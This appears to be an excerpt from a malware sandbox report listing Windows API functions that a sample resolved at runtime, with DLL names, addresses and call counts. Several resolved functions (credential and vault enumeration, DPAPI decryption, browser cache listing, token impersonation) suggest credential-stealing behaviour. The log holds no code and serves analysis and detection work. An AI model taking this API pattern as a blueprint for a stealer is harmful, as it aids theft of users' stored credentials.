| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x76b6374d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76b6ed38 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76b63d01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStartupInfoW, address_out = 0x76b63891 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76b676b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSListHead, address_out = 0x77395eeb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76b52331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateMutexW, address_out = 0x76b52aee |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceFrequency, address_out = 0x76b522a7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76b48b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnlockFileEx, address_out = 0x76b76947 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEndOfFile, address_out = 0x76b52319 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFullPathNameA, address_out = 0x76b63735 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x76b5db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LockFile, address_out = 0x76b7642f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringA, address_out = 0x76b4eb36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDiskFreeSpaceW, address_out = 0x76b43530 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedCompareExchange, address_out = 0x76b5bb92 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76b61400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFullPathNameW, address_out = 0x76b64543 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapCreate, address_out = 0x76b63ea2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TryEnterCriticalSection, address_out = 0x773832bc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x76b596fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AreFileApisANSI, address_out = 0x76b9f311 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenA, address_out = 0x76b5a611 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExpandEnvironmentStringsA, address_out = 0x76b48a5b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x76b4480b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77389ac5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x76b5ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSection, address_out = 0x7738a149 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76b63c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76b53b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LocalFree, address_out = 0x76b5ca64 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x76b5bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x76b5d9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpyA, address_out = 0x76b59793 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x76b6395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcatA, address_out = 0x76b5a19f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x76b5bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualQuery, address_out = 0x76b676d6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentDirectoryA, address_out = 0x76b4733c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetCurrentDirectoryA, address_out = 0x76b5903d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SystemTimeToFileTime, address_out = 0x76b5cecb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadConsoleW, address_out = 0x76b70e73 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteConsoleW, address_out = 0x76b582f1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetStdHandle, address_out = 0x76b9f589 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x76b58921 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x76b61dc3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x76b61dbc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineW, address_out = 0x76b6679e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x76b698ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOEMCP, address_out = 0x76b53db9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidCodePage, address_out = 0x76b6c1c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x7738a295 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x7738cd10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCPInfo, address_out = 0x76b61e2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringW, address_out = 0x76b59bee |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringW, address_out = 0x76b613d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoW, address_out = 0x76b66596 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsAlloc, address_out = 0x76b635a1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsGetValue, address_out = 0x76b5da70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsSetValue, address_out = 0x76b5da88 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsFree, address_out = 0x76b613b8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStringTypeW, address_out = 0x76b667c8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalAlloc, address_out = 0x76b59ce1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalFree, address_out = 0x76b59cf9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76b62d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x76b5a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x76b7532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileTime, address_out = 0x76b50f6f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedFlushSList, address_out = 0x77383129 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryExW, address_out = 0x76b54775 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RaiseException, address_out = 0x76b4eb60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RtlUnwind, address_out = 0x76b47f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitThread, address_out = 0x7735f611 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryAndExitThread, address_out = 0x76b4fdb8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleExW, address_out = 0x76b53e39 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x76b6214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x76b633f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStdHandle, address_out = 0x76b61e46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileType, address_out = 0x76b675a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleCP, address_out = 0x76b62c8a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleMode, address_out = 0x76b62412 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocale, address_out = 0x76b53de4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLCID, address_out = 0x76b66584 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesW, address_out = 0x76b9f3df |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetACP, address_out = 0x76b639aa |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointerEx, address_out = 0x76b4f5b2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeZoneInformation, address_out = 0x76b48a3b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76b60e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileExA, address_out = 0x76b9f3ef |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = IsCharAlphaNumericW, address_out = 0x76c09a7a |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x76c13f47 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGenRandom, address_out = 0x774cdfc8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetTokenInformation, address_out = 0x774d431c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ConvertSidToStringSidW, address_out = 0x774d4344 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = OpenProcessToken, address_out = 0x774d4304 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ImpersonateLoggedOnUser, address_out = 0x774cc57a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x774ea4b4 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x774d404a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDisablePredefinedCacheEx, address_out = 0x77503429 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x774d418e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumKeyExA, address_out = 0x774d1481 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExA, address_out = 0x774d4907 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = IsTextUnicode, address_out = 0x774d448e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateA, address_out = 0x77507381 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = DuplicateToken, address_out = 0x774cc7e6 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumKeyA, address_out = 0x774ea299 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyA, address_out = 0x774ccc15 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExA, address_out = 0x774d48ef |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x774d469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextW, address_out = 0x774cdf14 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateW, address_out = 0x77507481 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredFree, address_out = 0x774cb2ec |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptCreateHash, address_out = 0x774cdf4e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptHashData, address_out = 0x774cdf36 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyHash, address_out = 0x774cdf66 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExW, address_out = 0x774d468d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGetHashParam, address_out = 0x774cdf7e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueW, address_out = 0x774d48cc |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExW, address_out = 0x774d46ad |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptReleaseContext, address_out = 0x774ce124 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RevertToSelf, address_out = 0x774d1562 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x774c91dd |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x76d19d0b |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x76d186d3 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitialize, address_out = 0x76ceb636 |
|
1 | |
| Get Address | c:\windows\system32\userenv.dll | function = GetProfilesDirectoryA, address_out = 0x74b3e291 |
|
1 | |
| Get Address | c:\windows\system32\userenv.dll | function = ExpandEnvironmentStringsForUserA, address_out = 0x74b3e53d |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x771dd250 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrCmpW, address_out = 0x771e8277 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrCpyNW, address_out = 0x7720e0e6 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrChrW, address_out = 0x771e4640 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrCatW, address_out = 0x7720e105 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrA, address_out = 0x771fc45b |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = wnsprintfW, address_out = 0x771fef87 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrChrA, address_out = 0x771dc5e6 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = wnsprintfA, address_out = 0x771fedae |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptUnprotectData, address_out = 0x75645a7f |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = FindNextUrlCacheEntryW, address_out = 0x7726989c |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = FindCloseUrlCache, address_out = 0x77278409 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = FindFirstUrlCacheEntryW, address_out = 0x7726978a |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memcpy, address_out = 0x77364cc0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memcmp, address_out = 0x77363b1b |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = _wcslwr, address_out = 0x773f9e8c |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memmove, address_out = 0x77365000 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memset, address_out = 0x77365340 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = wcschr, address_out = 0x77387390 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strrchr, address_out = 0x77365900 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = _wcsicmp, address_out = 0x77386f61 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strncpy, address_out = 0x77365790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strstr, address_out = 0x773775c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strncmp, address_out = 0x773a25ec |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x77377690 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memchr, address_out = 0x77364c00 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strncat, address_out = 0x77365650 |
|
1 | |
| Get Address | c:\windows\system32\wtsapi32.dll | function = WTSQueryUserToken, address_out = 0x73f11f81 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x75dffb26 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 16, address_out = 0x75a96b0e |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 111, address_out = 0x75a937ad |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 19, address_out = 0x75a96f01 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 3, address_out = 0x75a93918 |
|
1 | |
| Get Address | c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll | function = InitializeCriticalSectionEx, address_out = 0x0 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x76b6418d |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x76b676e6 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76b61e16 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x76b9f72b |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77389981 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x76b418be |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x773545a5 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76b61f61 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x76b63879 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitOnceExecuteOnce, address_out = 0x76b59601 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x76b124d8 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreW, address_out = 0x76b4db8b |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x76b42111 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x76b4b009 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x773589be |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7734c02a |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7734c0d2 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x76b43f78 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77358bfb |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7734b567 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77375998 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77342251 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x773428f6 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x76b99aa9 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x76b4eb4e |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleEx, address_out = 0x76b538ad |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandle, address_out = 0x76b48d0f |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimePreciseAsFileTime, address_out = 0x0 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WakeConditionVariable, address_out = 0x773d5a7b |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSRWLock, address_out = 0x77389981 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x7738334e |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TryAcquireSRWLockExclusive, address_out = 0x77361801 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77383324 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SleepConditionVariableSRW, address_out = 0x76b423f5 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWork, address_out = 0x76b489f2 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SubmitThreadpoolWork, address_out = 0x773426a9 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWork, address_out = 0x77342111 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x76b6ebc6 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x76b453a5 |
|
2 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultEnumerateItems, address_out = 0x73943099 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultEnumerateVaults, address_out = 0x73942945 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultFree, address_out = 0x73944321 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultGetItem, address_out = 0x73943242 |
|
2 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultOpenVault, address_out = 0x739426a9 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultCloseVault, address_out = 0x73942718 |
|
1 | |
| Get Address | - | function = EnterCriticalSection, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = LeaveCriticalSection, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = InitializeCriticalSection, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = CloseHandle, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = DeleteCriticalSection, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = SetEvent, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = ResetEvent, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = WaitForSingleObjectEx, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = CreateEventW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetModuleHandleW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = IsDebuggerPresent, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetStartupInfoW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = IsProcessorFeaturePresent, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = QueryPerformanceCounter, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetCurrentProcessId, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetCurrentThreadId, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = InitializeSListHead, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetCurrentProcess, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = TerminateProcess, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = WideCharToMultiByte, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = EncodePointer, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = DecodePointer, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = MultiByteToWideChar, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = SetLastError, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = InitializeCriticalSectionAndSpinCount, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = TlsAlloc, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = TlsGetValue, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = TlsSetValue, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = TlsFree, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = LCMapStringW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetLocaleInfoW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetStringTypeW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetCPInfo, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetLastError, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = FreeLibrary, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = LoadLibraryExW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = RaiseException, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = InterlockedFlushSList, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = RtlUnwind, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = ExitProcess, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetModuleHandleExW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetModuleFileNameA, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = HeapAlloc, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = HeapReAlloc, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = HeapFree, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetACP, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetStdHandle, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetFileType, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = IsValidLocale, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetUserDefaultLCID, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = EnumSystemLocalesW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = FindClose, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
